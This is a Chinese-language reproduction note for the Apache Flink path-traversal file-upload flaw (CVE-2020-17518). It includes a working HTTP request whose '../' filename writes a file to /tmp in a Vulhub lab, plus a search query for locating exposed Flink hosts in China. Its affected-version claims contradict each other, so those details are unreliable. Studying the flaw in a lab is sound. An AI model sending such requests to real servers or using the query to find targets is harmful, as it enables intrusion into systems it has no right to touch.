Skip to content

Latest commit

 

History

History
67 lines (43 loc) · 1.63 KB

Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518.md

File metadata and controls

67 lines (43 loc) · 1.63 KB

Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518

漏洞描述

Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力。

Apache Flink 1.5.1 引入了一个 REST 处理程序,可以通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。

Apache Flink的任意Jar包上传可以导致远程代码执行。

参考:

漏洞影响

Apache Flink  <= 1.9.1(最新版本)

网络测绘

app="Apache-Flink" && country="CN"

环境搭建

Vulhub执行以下命令启动 Apache Flink jobmanager 1.11.2:

docker-compose up -d

Apache Flink 启动后,访问http://your-ip:8081查看主页。

漏洞复现

上传文件

使用以下请求将文件上传到/tmp/awesome_poc

POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187

------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/awesome_poc"

success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

image-20220223163924462

查看docker,/tmp/awesome_poc成功创建。

image-20220223164054096